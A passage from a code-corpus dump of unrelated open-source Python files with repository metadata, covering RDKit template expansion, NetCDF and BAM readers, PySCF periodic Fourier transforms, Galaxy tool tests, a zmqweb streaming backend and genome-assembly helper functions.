logger.warning('The substructure pattern did not match sidechain %d. This may result in errors.'%(idx+1))
if replace:
tmp = list(Chem.ReplaceSubstructs(mol,patt,replacement))
if not useAll: tmp = [tmp[0]]
for i,entry in enumerate(tmp):
entry = MoveDummyNeighborsToBeginning(entry)
if not entry:
continue
entry = entry[0]
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
tmp[i] = (idx+1,entry)
else:
# no replacement, use the pattern to reorder
# atoms only:
matches = mol.GetSubstructMatches(patt)
if matches:
tmp = []
for match in matches:
smi = Chem.MolToSmiles(mol,True,rootedAtAtom=match[0])
entry = Chem.MolFromSmiles(smi)
for propN in mol.GetPropNames():
entry.SetProp(propN,mol.GetProp(propN));
# now we have a molecule with the atom to be joined
# in position zero; Keep that:
tmp.append((idx+1,entry))
else:
tmp = None
else:
tmp = [(idx+1,mol)]
if tmp:
res.extend(tmp)
return res
if __name__=='__main__':
import getopt,sys
print >>sys.stderr,_greet
try:
args,extras = getopt.getopt(sys.argv[1:],'o:h',[
'sdf',
'moltemplate',
'molTemplate',
'smilesFileTemplate',
'templateSmarts=',
'redraw',
'force',
'useall',
'useallmatches',
'autoNames',
'3D','3d',
'tethers',
'tether',
])
except:
import traceback
traceback.print_exc()
Usage()
if len(extras)<3:
Usage()
tooLong=1000
sdLigands=False
molTemplate=False
redrawTemplate=False
outF=None
forceIt=False
useAll=False
templateSmarts=[]
smilesFileTemplate=False
autoNames=False
do3D=False
useTethers=False
for arg,val in args:
if arg=='-o':
outF=val
elif arg=='--sdf':
sdLigands=True
elif arg in ('--moltemplate','--molTemplate'):
molTemplate=True
elif arg=='--smilesFileTemplate':
smilesFileTemplate=True
elif arg=='--templateSmarts':
templateSmarts = val
elif arg=='--redraw':
redrawTemplate=True
elif arg=='--force':
forceIt=True
elif arg=='--autoNames':
autoNames=True
elif arg in ('--useall','--useallmatches'):
useAll=True
elif arg in ('--3D','--3d'):
do3D=True
elif arg in ('--tethers','--tether'):
useTethers=True
elif arg=='-h':
Usage()
sys.exit(0)
if do3D:
if not molTemplate:
raise ValueError,'the --3D option is only useable in combination with --moltemplate'
if redrawTemplate:
logger.warning('--redrawTemplate does not make sense in combination with --molTemplate. removing it')
redrawTemplate=False
if templateSmarts:
splitL = templateSmarts.split(' ')
templateSmarts = []
for i,sma in enumerate(splitL):
patt = Chem.MolFromSmarts(sma)
if not patt:
raise ValueError,'could not convert smarts "%s" to a query'%sma
if i>=4:
i+=1
replace = Chem.MolFromSmiles('[%d*]'%(i+1))
templateSmarts.append((patt,replace))
if molTemplate:
removeHs = not do3D
try:
s = Chem.SDMolSupplier(extras[0],removeHs=removeHs)
templates = [x for x in s]
except:
logger.error('Could not construct templates from input file: %s'%extras[0],
exc_info=True)
sys.exit(1)
if redrawTemplate:
for template in templates:
AllChem.Compute2DCoords(template)
else:
if not smilesFileTemplate:
try:
templates = [Chem.MolFromSmiles(extras[0])]
except:
logger.error('Could not construct template from smiles: %s'%extras[0],
exc_info=True)
sys.exit(1)
else:
try:
s = Chem.SmilesMolSupplier(extras[0],titleLine=False)
templates = [x for x in s]
except:
logger.error('Could not construct templates from input file: %s'%extras[0],
exc_info=True)
sys.exit(1)
for template in templates:
AllChem.Compute2DCoords(template)
if templateSmarts:
finalTs = []
for i,template in enumerate(templates):
for j,(patt,replace) in enumerate(templateSmarts):
if not template.HasSubstructMatch(patt):
logger.error('template %d did not match sidechain pattern %d, skipping it'%(i+1,j+1))
        template = None
break
template = Chem.ReplaceSubstructs(template,patt,replace)[0]
if template:
Chem.SanitizeMol(template)
finalTs.append(template)
templates = finalTs
sidechains = []
pos = 1
while pos<len(extras):
if extras[pos]=='-r':
replaceIt=False
pos += 1
else:
replaceIt=True
if extras[pos]=='-n':
sma = None
else:
sma = extras[pos]
pos += 1
try:
dat = extras[pos]
except IndexError:
logger.error('missing a sidechain filename')
sys.exit(-1)
pos += 1
if sdLigands:
try:
suppl = Chem.SDMolSupplier(dat)
except:
logger.error('could not construct supplier from SD file: %s'%dat,
exc_info=True)
suppl = []
else:
tmpF = file(dat,'r')
inL = tmpF.readline()
if len(inL.split(' '))<2:
nmCol=-1
else:
nmCol=1
try:
suppl = Chem.SmilesMolSupplier(dat,nameColumn=nmCol)
except:
logger.error('could not construct supplier from smiles file: %s'%dat,
exc_info=True)
suppl = []
suppl = [x for x in suppl]
chains = ConstructSidechains(suppl,sma=sma,replace=replaceIt,useAll=useAll)
if chains:
sidechains.append(chains)
count = 1
for chain in sidechains:
count *= len(chain)
count *= len(templates)
if not sidechains or not count:
print >>sys.stderr,"No molecules to be generated."
sys.exit(0)
if not forceIt and count>tooLong:
print >>sys.stderr,"This will generate %d molecules."%count
print >>sys.stderr,"Continue anyway? [no] ",
sys.stderr.flush()
ans = sys.stdin.readline().strip()
if ans not in ('y','yes','Y','YES'):
sys.exit(0)
if outF and outF!="-":
try:
outF = file(outF,'w+')
except IOError:
logger.error('could not open file %s for writing'%(outF),
exc_info=True)
else:
outF = sys.stdout
for template in templates:
Explode(template,sidechains,outF,autoNames=autoNames,do3D=do3D,
useTethers=useTethers)
|
rdkit/rdkit-orig
|
rdkit/Chem/ChemUtils/TemplateExpand.py
|
Python
|
bsd-3-clause
| 14,044
|
[
"RDKit"
] |
9bfa50a2641bd54f35e3fc2317fffaa7cb5b7d73e9c5b666457e753056c55079
|
import os
import numpy as np
from scipy.io.netcdf import netcdf_file
from netCDF4 import Dataset
def file2dict(filename):
if not os.path.isfile(filename):
raise ValueError("ERROR: Could not read %s" % filename)
nc = netcdf_file(filename, 'r', mmap=False)
ret = {}
for ikey in nc.variables.keys():
data = nc.variables[ikey].data
if type(data[0]) == np.float64:
if len(data) == 1:
data = float(data[0])
else:
data = [float(x) for x in data]
elif type(data[0]) == np.int32:
if len(data) == 1:
data = int(data[0])
else:
data = [int(x) for x in data]
else:
data = list(data)
ret[ikey] = data
del data
nc.close()
return ret
def netcdf2dict(filename):
"""
Read a NetCDF file and create a python dictionary with
numbers or lists for each variable
Args:
filename:
NetCDF filename
"""
if not os.path.isfile(filename):
print('ERROR: No such file: ', filename)
return None
ret = {}
netcdfile = netcdf_file(filename, 'r', mmap=False)
for ii in netcdfile.variables.keys():
ret[ii] = netcdfile.variables[ii][:]
netcdfile.close()
for i in ret:
if ret[i].dtype == np.dtype('>f8'):
ret[i] = [round(x, 11) for x in ret[i].flatten()]
elif ret[i].dtype == np.dtype('>i4'):
ret[i] = [int(x) for x in ret[i].flatten()]
for i in ret:
if len(ret[i]) == 1:
ret[i] = ret[i][0]
return ret
def netcdf4_to_dict(filename):
rootgrp = Dataset(filename, "r", format="NETCDF4")
ret={}
for var in rootgrp.variables:
ret[var]=list(rootgrp[var][:])
for i in ret:
if len(ret[i]) == 1:
ret[i] = ret[i][0]
rootgrp.close()
return ret
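# Hedged usage sketch (not part of the original module): it only exercises the
# helpers defined above. The filename 'example.nc' is a hypothetical placeholder
# for any NetCDF file on disk.
if __name__ == '__main__':
    example_file = 'example.nc'
    if os.path.isfile(example_file):
        data = netcdf2dict(example_file)
        for key in sorted(data):
            print('%s -> %s' % (key, data[key]))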
|
MaterialsDiscovery/PyChemia
|
pychemia/utils/netcdf.py
|
Python
|
mit
| 1,924
|
[
"NetCDF"
] |
2d337a3fe78efeaeebb78fe627fada8c1f559ba57424b39d7315170f8aa9dfd3
|
import pysam
import time
import scipy as sp
import sys
import os
import warnings
import pdb
from sets import Set
def get_counts_from_single_bam(fn_bam, regions):
"""This function extracts read counts from a given bam file spanning
a set of given intervals."""
if not os.path.exists(fn_bam + '.bai'):
#raise Exception('\nERROR: alignment file %s seems not to be indexed\n' % fn_bam)
warnings.warn('WARNING: alignment file %s seems not to be indexed and will be skipped! \n' % fn_bam)
dummy = sp.zeros(regions.shape[0] * 2)
dummy[:] = sp.nan
return dummy
if not os.stat(fn_bam).st_size > 0:
        warnings.warn('WARNING: alignment file %s seems to be empty and will be skipped! \n' % fn_bam)
dummy = sp.zeros(regions.shape[0] * 2)
dummy[:] = sp.nan
return dummy
samfile = pysam.Samfile(fn_bam, 'rb')
refseqs = samfile.references
cnts = []
t0 = time.time()
for i, rec in enumerate(regions):
if i > 0 and i % 100 == 0:
print '%i rounds to go. ETA %.0f seconds' % (regions.shape[0] - i, (time.time() - t0) / i * (regions.shape[0] - i))
if len(regions.shape) == 1:
chrm = rec.split(':')[0]
if not chrm in refseqs:
chrm = chrm.strip('chr')
start1 = int(rec.split(':')[1].split('-')[0])
end1 = int(rec.split(':')[1].split('-')[1])
start2 = None
end2 = None
else:
chrm = rec[0].split(':')[0]
if not chrm in refseqs:
chrm = chrm.strip('chr')
start1 = int(rec[0].split(':')[1].split('-')[0])
end1 = int(rec[0].split(':')[1].split('-')[1])
start2 = int(rec[1].split(':')[1].split('-')[0])
end2 = int(rec[1].split(':')[1].split('-')[1])
try:
#readids = Set([])
#dummy = [readids.add(read.query_name) for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]
#len(readids)
cnt1 = len([1 for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]) #Otherwise does not match firebrowse
if start2 is None:
cnt2 = cnt1
else:
readids = Set([])
dummy = [readids.add(read.query_name) for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]
cnt2 = len([1 for read in samfile.fetch(chrm, start1, end1) if not read.is_secondary]) #Otherwise does not match firebrowse
#cnt2 = len([1 for read in samfile.fetch(chrm, start2, end2) if not read.is_secondary])
#cnt1 = samfile.count(chrm, start1, end1)
#cnt2 = samfile.count(chrm, start2, end2)
except ValueError:
print >> sys.stderr, 'Ignored %s' % chrm
cnt1 = 1
cnt2 = 1
finally:
cnts.append([cnt1, cnt2])
samfile.close()
return sp.array(cnts, dtype='float').ravel('C')
def get_counts_from_multiple_bam(fn_bams, regions):
""" This is a wrapper to concatenate counts for a given list of bam
files"""
if len(fn_bams) == 1:
return get_counts_from_single_bam(fn_bams[0], regions)[:, sp.newaxis]
else:
return sp.hstack([get_counts_from_single_bam(fn_bams[i], regions)[:,sp.newaxis] for i in range(len(fn_bams))])
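# Hedged usage sketch (not part of the original module): region strings follow
# the 'chrom:start-end' format parsed by get_counts_from_single_bam; the BAM
# file names below are hypothetical placeholders. Missing index files simply
# trigger the warning path above and yield NaN counts.
if __name__ == '__main__':
    example_regions = sp.array(['chr1:10000-10500', 'chr2:20000-20500'])
    example_bams = ['sample1.bam', 'sample2.bam']
    counts = get_counts_from_multiple_bam(example_bams, example_regions)
    print counts.shape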
|
KjongLehmann/m53
|
libs/bam.py
|
Python
|
mit
| 3,463
|
[
"pysam"
] |
785f9702e29d54ebb44492a586aabb57387157f36931087eb70f21ee25f56908
|
#! /usr/bin/env python
"""Assembly execution drivers.
This module provides the default parameters and handling of
assembler-specific configurations.
Assembler defaults are set in the 'arast.conf' file
"""
import logging
import os
import re
import subprocess
import shutil
import glob
import metadata as meta
from ConfigParser import SafeConfigParser
def get_default(key):
"""Get assemblers default value from config file."""
return parser.get('assemblers', key)
def run(assembler, job_data):
plugin = self.pmanager.getPluginByName(assembler)
settings = plugin.details.items('Settings')
return plugin.plugin_object(settings, job_data)
def get_tar_name(job_id, suffix):
name = 'job' + str(job_id)
name += '_'
name += suffix
name += '.tar.gz'
return name
def tar(outpath, asm_data, tarname):
print "Compressing"
outfile = outpath + '/tar/'
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, asm_data]
t = subprocess.Popen(targs)
t.wait()
return outfile
def tar_directory(outpath, directory, tarname):
outfile = outpath
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, './']
t = subprocess.Popen(targs, cwd=directory)
t.wait()
return outfile
def tar_list(outpath, file_list, tarname):
""" Tars a file list. Attempts to find the highest common path"""
common_path = os.path.commonprefix(file_list)
outfile = outpath + '/tar/'
try: os.makedirs(outfile)
except: pass
outfile += tarname
targs = ['tar', '-czvf', outfile]
targs += [os.path.relpath(path, common_path) for path in file_list]
logging.debug("Tar command: %s: " % targs)
t = subprocess.Popen(targs, cwd=common_path)
t.wait()
return outfile
def ls_recursive(path):
""" Returns list of all files in a dir"""
allfiles = []
for root, sub_dirs, files in os.walk(path):
for f in files:
allfiles.append(os.path.join(root, f))
return allfiles
def prefix_file_move(file, prefix):
""" Adds prefix to file, returns new file name, moves file"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
os.rename(file, newfile)
return newfile
def prefix_file(file, prefix):
""" Adds prefix to file, returns new filename"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
return newfile
def rename_file_copy(filepath, newname):
""" Renames the file, keeping the file extension, copies to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
shutil.copy(filepath, newfile)
return newfile
def rename_file_symlink(filepath, newname):
""" Renames the file, keeping the file extension, symlinks to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
os.symlink(filepath, newfile)
return newfile
def get_fasta(directory):
""" Return the list of Fasta files in DIRECTORY
"""
files = os.listdir(directory)
fasta_files = [file for file in files
if re.search(r'\.fa$|\.fasta$', file, re.IGNORECASE) is not None]
return fasta_files
def get_fastq(directory):
""" Return the list of Fastq files in DIRECTORY
"""
files = os.listdir(directory)
fastq_files = [file for file in files
if re.search(r'\.fq$|\.fastq$', file, re.IGNORECASE) is not None]
return fastq_files
def get_quala(directory):
""" Return the list of Quala files in DIRECTORY
"""
files = os.listdir(directory)
quala_files = [file for file in files
if re.search(r'\.qa$|\.quala$', file, re.IGNORECASE) is not None]
    return quala_files
def read_config():
pass
def run_bwa(data_dir, ref_name, read_files, prefix):
""" Ex: run_bwa(velvet_data, 'contigs.fa', reads_list, 'velvet') """
bwa_exec = 'bwa'
samtools_exec = 'samtools'
tmp_files = []
ref_file = data_dir + ref_name
# Run the index on reference
bwa_args = [bwa_exec, 'index']
bwa_args.append(ref_file)
logging.info(bwa_args)
p_index = subprocess.Popen(bwa_args)
p_index.wait()
# Align reads to reference
bwa_args = [bwa_exec, 'aln']
bwa_args.append(ref_file)
if len(read_files) > 1:
# Concatenate read files
reads = data_dir + 'reads.fa'
destination = open(reads,'wb')
for rf in read_files:
logging.info("Concatenating read file: %s", rf)
shutil.copyfileobj(open(rf,'rb'), destination)
destination.close()
tmp_files.append(reads)
else:
reads = read_files[0]
bwa_args.append(reads)
aln_out = data_dir + prefix
aln_out += '_aln.sai'
aln_outbuffer = open(aln_out, 'wb')
tmp_files.append(aln_out)
bwa_args.append(aln_out)
logging.info(bwa_args)
p_aln = subprocess.Popen(bwa_args, stdout=aln_outbuffer)
p_aln.wait()
aln_outbuffer.close()
# Create Sam file
#bwa samse $ref $dir/aln-$refX$reads.sai $reads > $dir/aln-$refX$reads.sam
bwa_args = [bwa_exec, 'samse', ref_file, aln_out, reads]
sam_out = data_dir + prefix
sam_out += '_aln.sam'
sam_outbuffer = open(sam_out, 'wb')
tmp_files.append(sam_out)
bwa_args.append(sam_out)
logging.info(bwa_args)
p_sam = subprocess.Popen(bwa_args, stdout=sam_outbuffer)
p_sam.wait()
sam_outbuffer.close()
# Create bam file
# samtools view -S -b -o $dir/aln-$refX$reads.bam $dir/aln-$refX$reads.sam
samtools_args = [samtools_exec, 'view', '-S', '-b', '-o']
bam_out = data_dir + prefix
bam_out += '_aln.bam'
bam_outbuffer = open(bam_out, 'wb')
samtools_args.append(bam_out)
samtools_args.append(sam_out)
logging.info(samtools_args)
p_bam = subprocess.Popen(samtools_args, stdout=bam_outbuffer)
p_bam.wait()
bam_outbuffer.close()
for temp in tmp_files:
try:
os.remove(temp)
except:
logging.info("Could not remove %s" % temp)
return bam_out
def get_qual_encoding(file):
f = open(file, 'r')
while True:
bline = f.readline()
if bline.find('+') != -1: # Line before quality line
line = f.readline()
for c in line:
if ord(c) > 74:
logging.info("Detected phred64 quality encoding")
return 'phred64'
elif ord(c) < 64:
logging.info("Detected phred33 quality encoding")
return 'phred33'
if len(bline) == 0: #EOF
break
return
def tab_to_fasta(tabbed_file, outfile, threshold):
tabbed = open(tabbed_file, 'r')
fasta = open(outfile, 'w')
#prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', '\n']
prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', ' seed_', '\n']
for line in tabbed:
l = line.split('\t')
if int(l[1]) <= threshold:
for i in range(len(l)):
fasta.write(prefixes[i] + l[i])
tabbed.close()
fasta.close()
def arast_reads(filelist):
""" Returns a list of files into the ARAST reads dict format """
filedicts = []
for f in filelist:
filedicts.append({'type':'single', 'files':[f]})
return filedicts
parser = SafeConfigParser()
#parser.read('arast.conf')
#basepath = get_default('basepath')
#metadata = meta.MetadataConnection(parser.get('meta','mongo.remote.host'))
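# Hedged configuration sketch (an assumption, not shipped with this module): the
# commented-out lines above suggest an 'arast.conf' INI file with at least an
# [assemblers] section (e.g. a 'basepath' key) and a [meta] section, roughly:
#
#   [assemblers]
#   basepath = /data/assembly
#
#   [meta]
#   mongo.remote.host = localhost
#
# after which the module would be initialised with something like:
#
#   parser.read('arast.conf')
#   basepath = get_default('basepath')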
|
cbun/assembly
|
lib/assembly/assembly.py
|
Python
|
mit
| 7,846
|
[
"BWA"
] |
64129e204620fa9eea49a5d292df86378c43bc7b654dd4ac962ba255ab20c5d4
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Analytic Fourier transformation AO-pair value for PBC
'''
import ctypes
import numpy
from pyscf import lib
from pyscf import gto
from pyscf.gto.ft_ao import ft_ao as mol_ft_ao
from pyscf.pbc.lib.kpts_helper import is_zero, gamma_point
libpbc = lib.load_library('libpbc')
#
# \int mu*nu*exp(-ik*r) dr
#
def ft_aopair(cell, Gv, shls_slice=None, aosym='s1',
b=None, gxyz=None, Gvbase=None, kpti_kptj=numpy.zeros((2,3)),
q=None, intor='GTO_ft_ovlp', comp=1, verbose=None):
r'''
FT transform AO pair
\sum_T exp(-i k_j * T) \int exp(-i(G+q)r) i(r) j(r-T) dr^3
'''
kpti, kptj = kpti_kptj
if q is None:
q = kptj - kpti
val = _ft_aopair_kpts(cell, Gv, shls_slice, aosym, b, gxyz, Gvbase,
q, kptj.reshape(1,3), intor, comp)
return val[0]
# NOTE buffer out must be initialized to 0
# gxyz is the index for Gvbase
def _ft_aopair_kpts(cell, Gv, shls_slice=None, aosym='s1',
b=None, gxyz=None, Gvbase=None, q=numpy.zeros(3),
kptjs=numpy.zeros((1,3)), intor='GTO_ft_ovlp', comp=1,
out=None):
r'''
FT transform AO pair
\sum_T exp(-i k_j * T) \int exp(-i(G+q)r) i(r) j(r-T) dr^3
The return array holds the AO pair
corresponding to the kpoints given by kptjs
'''
intor = cell._add_suffix(intor)
q = numpy.reshape(q, 3)
kptjs = numpy.asarray(kptjs, order='C').reshape(-1,3)
Gv = numpy.asarray(Gv, order='C').reshape(-1,3)
nGv = Gv.shape[0]
GvT = numpy.asarray(Gv.T, order='C')
GvT += q.reshape(-1,1)
if (gxyz is None or b is None or Gvbase is None or (abs(q).sum() > 1e-9)
# backward compatibility for pyscf-1.2, in which the argument Gvbase is gs
or (Gvbase is not None and isinstance(Gvbase[0], (int, numpy.integer)))):
p_gxyzT = lib.c_null_ptr()
p_mesh = (ctypes.c_int*3)(0,0,0)
p_b = (ctypes.c_double*1)(0)
eval_gz = 'GTO_Gv_general'
else:
if abs(b-numpy.diag(b.diagonal())).sum() < 1e-8:
eval_gz = 'GTO_Gv_orth'
else:
eval_gz = 'GTO_Gv_nonorth'
gxyzT = numpy.asarray(gxyz.T, order='C', dtype=numpy.int32)
p_gxyzT = gxyzT.ctypes.data_as(ctypes.c_void_p)
b = numpy.hstack((b.ravel(), q) + Gvbase)
p_b = b.ctypes.data_as(ctypes.c_void_p)
p_mesh = (ctypes.c_int*3)(*[len(x) for x in Gvbase])
Ls = cell.get_lattice_Ls()
expkL = numpy.exp(1j * numpy.dot(kptjs, Ls.T))
atm, bas, env = gto.conc_env(cell._atm, cell._bas, cell._env,
cell._atm, cell._bas, cell._env)
ao_loc = gto.moleintor.make_loc(bas, intor)
if shls_slice is None:
shls_slice = (0, cell.nbas, cell.nbas, cell.nbas*2)
else:
shls_slice = (shls_slice[0], shls_slice[1],
cell.nbas+shls_slice[2], cell.nbas+shls_slice[3])
ni = ao_loc[shls_slice[1]] - ao_loc[shls_slice[0]]
nj = ao_loc[shls_slice[3]] - ao_loc[shls_slice[2]]
nkpts = len(kptjs)
nimgs = len(Ls)
shape = (nkpts, comp, ni, nj, nGv)
# Theoretically, hermitian symmetry can be also found for kpti == kptj:
# f_ji(G) = \int f_ji exp(-iGr) = \int f_ij^* exp(-iGr) = [f_ij(-G)]^*
# hermi operation needs reordering the axis-0. It is inefficient.
if aosym == 's1hermi': # Symmetry for Gamma point
assert(is_zero(q) and is_zero(kptjs) and ni == nj)
elif aosym == 's2':
i0 = ao_loc[shls_slice[0]]
i1 = ao_loc[shls_slice[1]]
nij = i1*(i1+1)//2 - i0*(i0+1)//2
shape = (nkpts, comp, nij, nGv)
drv = libpbc.PBC_ft_latsum_drv
cintor = getattr(libpbc, intor)
eval_gz = getattr(libpbc, eval_gz)
if nkpts == 1:
fill = getattr(libpbc, 'PBC_ft_fill_nk1'+aosym)
else:
fill = getattr(libpbc, 'PBC_ft_fill_k'+aosym)
out = numpy.ndarray(shape, dtype=numpy.complex128, buffer=out)
drv(cintor, eval_gz, fill, out.ctypes.data_as(ctypes.c_void_p),
ctypes.c_int(nkpts), ctypes.c_int(comp), ctypes.c_int(nimgs),
Ls.ctypes.data_as(ctypes.c_void_p), expkL.ctypes.data_as(ctypes.c_void_p),
(ctypes.c_int*4)(*shls_slice), ao_loc.ctypes.data_as(ctypes.c_void_p),
GvT.ctypes.data_as(ctypes.c_void_p), p_b, p_gxyzT, p_mesh, ctypes.c_int(nGv),
atm.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(cell.natm),
bas.ctypes.data_as(ctypes.c_void_p), ctypes.c_int(cell.nbas),
env.ctypes.data_as(ctypes.c_void_p))
if aosym == 's1hermi':
for i in range(1,ni):
out[:,:,:i,i] = out[:,:,i,:i]
out = numpy.rollaxis(out, -1, 2)
if comp == 1:
out = out[:,0]
return out
def ft_ao(mol, Gv, shls_slice=None, b=None,
gxyz=None, Gvbase=None, kpt=numpy.zeros(3), verbose=None):
if gamma_point(kpt):
return mol_ft_ao(mol, Gv, shls_slice, b, gxyz, Gvbase, verbose)
else:
kG = Gv + kpt
return mol_ft_ao(mol, kG, shls_slice, None, None, None, verbose)
if __name__ == '__main__':
import pyscf.pbc.gto as pgto
import pyscf.dft.numint
from pyscf.pbc import tools
L = 5.
n = 20
cell = pgto.Cell()
cell.a = numpy.diag([L,L,L])
cell.mesh = numpy.array([n,n,n])
cell.atom = '''C 1.3 .2 .3
C .1 .1 1.1
'''
cell.basis = 'ccpvdz'
#cell.basis = {'C': [[0, (2.4, .1, .6), (1.0,.8, .4)], [1, (1.1, 1)]]}
#cell.basis = {'C': [[0, (2.4, 1)]]}
cell.unit = 'B'
#cell.verbose = 4
cell.build(0,0)
#cell.nimgs = (2,2,2)
ao2 = ft_aopair(cell, cell.Gv)
nao = cell.nao_nr()
coords = pyscf.pbc.dft.gen_grid.gen_uniform_grids(cell)
aoR = cell.pbc_eval_gto('GTOval', coords)
aoR2 = numpy.einsum('ki,kj->kij', aoR.conj(), aoR)
ngrids = aoR.shape[0]
for i in range(nao):
for j in range(nao):
ao2ref = tools.fft(aoR2[:,i,j], cell.mesh) * cell.vol/ngrids
print(i, j, numpy.linalg.norm(ao2ref - ao2[:,i,j]))
aoG = ft_ao(cell, cell.Gv)
for i in range(nao):
aoref = tools.fft(aoR[:,i], cell.mesh) * cell.vol/ngrids
print(i, numpy.linalg.norm(aoref - aoG[:,i]))
|
gkc1000/pyscf
|
pyscf/pbc/df/ft_ao.py
|
Python
|
apache-2.0
| 6,876
|
[
"PySCF"
] |
f9681443bedb96a9bfb3052981719e9046ef5b9060e1b58f38fb777bd4de6c59
|
import new, sys
import galaxy.util
import parameters
from parameters import basic
from parameters import grouping
from elementtree.ElementTree import XML
class ToolTestBuilder( object ):
"""
Encapsulates information about a tool test, and allows creation of a
dynamic TestCase class (the unittest framework is very class oriented,
    doing dynamic tests in this way allows better integration)
"""
def __init__( self, tool, name ):
self.tool = tool
self.name = name
self.required_files = []
self.inputs = []
self.outputs = []
self.error = False
self.exception = None
def add_param( self, name, value, extra ):
try:
if name not in self.tool.inputs:
for input_name, input_value in self.tool.inputs.items():
if isinstance( input_value, grouping.Conditional ) or isinstance( input_value, grouping.Repeat ):
self.__expand_grouping_for_data_input(name, value, extra, input_name, input_value)
elif isinstance( self.tool.inputs[name], parameters.DataToolParameter ):
self.required_files.append( ( value, extra ) )
except: pass
self.inputs.append( ( name, value, extra ) )
def add_output( self, name, file ):
self.outputs.append( ( name, file ) )
def __expand_grouping_for_data_input( self, name, value, extra, grouping_name, grouping_value ):
# Currently handles grouping.Conditional and grouping.Repeat
if isinstance( grouping_value, grouping.Conditional ):
if name != grouping_value.test_param.name:
for case in grouping_value.cases:
for case_input_name, case_input_value in case.inputs.items():
if case_input_name == name and isinstance( case_input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
elif isinstance( case_input_value, grouping.Conditional ):
self.__expand_grouping_for_data_input(name, value, extra, case_input_name, case_input_value)
elif isinstance( grouping_value, grouping.Repeat ):
# FIXME: grouping.Repeat can only handle 1 repeat param element since the param name
# is something like "input2" and the expanded page display is something like "queries_0|input2".
# The problem is that the only param name on the page is "input2", and adding more test input params
# with the same name ( "input2" ) is not yet supported in our test code ( the lat one added is the only
# one used ).
for input_name, input_value in grouping_value.inputs.items():
if input_name == name and isinstance( input_value, basic.DataToolParameter ):
self.required_files.append( ( value, extra ) )
return True
|
dbcls/dbcls-galaxy
|
lib/galaxy/tools/test.py
|
Python
|
mit
| 2,997
|
[
"Galaxy"
] |
06b06591f5793691f23800da59fdecf7d6f1d897864227b9ea38d9dd3b23e2e4
|
"""A backend request handler process.
This file uses zmq.web to implement the backend logic for load balanced
Tornado request handlers.
This version uses a streaming message protocol to enable the backend to send
the HTTP body back to the frontend/browser in multiple asynchronous chunks.
To enable streaming mode, you have to use ZMQStreamingApplicationProxy in
the frontend and ZMQStreamingHTTPRequest in the backend.
To run this example:
* Start one instance of frontend_stream.py.
* Start one or more instances of backend_stream.py.
* Hit the URLs http://127.0.0.1:8888/foo and http://127.0.0.1:8888/foo/sleep?t=1.
The t parameter of this last URL can be changed to something greater than 10 to
observe the timeout behavior.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2012 Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
import logging
logging.basicConfig(level=logging.DEBUG)
import time
from zmq.eventloop import ioloop
ioloop.install()
from tornado import web
from zmqweb import ZMQApplication, ZMQStreamingHTTPRequest
def flush_callback():
logging.info('Done flushing zmq buffers')
class FooHandler(web.RequestHandler):
@web.asynchronous
def get(self):
self.set_header('Handler', 'FooHandler')
        # Each write/flush pair is sent back to the frontend/browser immediately.
self.write('pow\n')
self.flush(callback=flush_callback)
self.bam_count = 10
def bam_and_finish():
if self.bam_count>0:
                # Each write/flush pair is sent back to the frontend/browser immediately.
self.write('bam\n')
self.flush(callback=flush_callback)
self.bam_count -= 1
else:
self.bam_pc.stop()
# Calling finish sends a final message to finish the request.
self.finish()
self.bam_pc = ioloop.PeriodicCallback(bam_and_finish, 1000, ioloop.IOLoop.instance())
self.bam_pc.start()
class SleepHandler(web.RequestHandler):
def get(self):
t = float(self.get_argument('t',1.0))
time.sleep(t)
self.finish({'status':'awake','t':t})
application = ZMQApplication(
[
# A single ZMQApplication can run multiple request handlers, but the
# frontend must use a URL regular expression that matches all of the
# patterns in the backend.
(r"/foo", FooHandler),
(r"/foo/sleep", SleepHandler)
],
    # To use streaming replies, we need to set http_request_class to
# ZMQStreamingHTTPRequest. The frontend needs to use
# ZMQStreamingApplicationProxy in this case.
http_request_class=ZMQStreamingHTTPRequest
)
# Connect to the frontend on port 5555.
application.connect('tcp://127.0.0.1:5555')
ioloop.IOLoop.instance().start()
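# Hedged client sketch (not part of this example): with frontend_stream.py and
# this backend running, the streamed chunks from the URL in the module docstring
# can be observed from Python 2 with urllib2, e.g.:
#
#   import urllib2
#   resp = urllib2.urlopen('http://127.0.0.1:8888/foo')
#   for line in resp:
#       print line.rstrip()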
|
ellisonbg/zmqweb
|
examples/backend_stream.py
|
Python
|
bsd-3-clause
| 3,064
|
[
"Brian"
] |
9bfab99f1b0c1f6de1894e29b43121cadaf07f94a94c57a9de66d7c8d42db67e
|
from erukar.system.engine import MaterialGood
class SalericiteCrystal(MaterialGood):
BaseName = "Salericite Crystal"
BriefDescription = "a chunk of crystalline salericite"
BasePricePerSingle = 118
WeightPerSingle = 0.6
|
etkirsch/legends-of-erukar
|
